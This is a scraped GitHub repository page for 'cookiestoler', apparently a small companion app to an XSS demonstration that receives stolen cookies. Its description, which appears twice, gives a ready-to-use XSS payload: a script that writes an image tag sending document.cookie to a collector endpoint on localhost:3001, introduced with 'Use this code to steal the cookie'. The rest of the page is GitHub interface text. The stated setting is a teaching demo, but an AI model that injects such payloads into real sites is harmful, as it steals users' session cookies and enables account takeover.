Skip to content

Simple app to get the cookies content from the XSS demo app (made by kacper sokolowski). Use this code to steal the cookie : <script type="text/javascript"> document.write('<img src="http://localhost:3001/v1/cookie?cookie=' + document.cookie + '" />') </script>

Notifications You must be signed in to change notification settings

deckbsd/cookiestoler

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 

About

Simple app to get the cookies content from the XSS demo app (made by kacper sokolowski). Use this code to steal the cookie : <script type="text/javascript"> document.write('<img src="http://localhost:3001/v1/cookie?cookie=' + document.cookie + '" />') </script>

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published